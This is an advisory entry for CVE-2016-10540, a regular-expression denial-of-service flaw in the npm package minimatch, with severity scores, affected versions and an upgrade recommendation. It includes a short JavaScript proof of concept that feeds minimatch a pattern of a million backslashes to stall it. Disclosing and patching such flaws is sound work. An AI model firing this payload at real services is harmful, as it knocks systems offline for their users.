CVE-2016-10540
HIGH7.5EPSS 0.43%Regular Expression Denial of Service in minimatch
Published: 10/9/2018Modified: 11/8/2023
Description
Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`. ## Proof of Concept ```js var minimatch = require(“minimatch”); // utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; } var exploit = “[!” + genstr(1000000, “\\”) + “A”; // minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ``` ## Recommendation Update to version 3.0.2 or later.
Affected packages (2)
- Debian/node-minimatchfrom 0, < 3.0.3-1
- npm/minimatchfrom 0, < 3.0.2
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH7.5 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |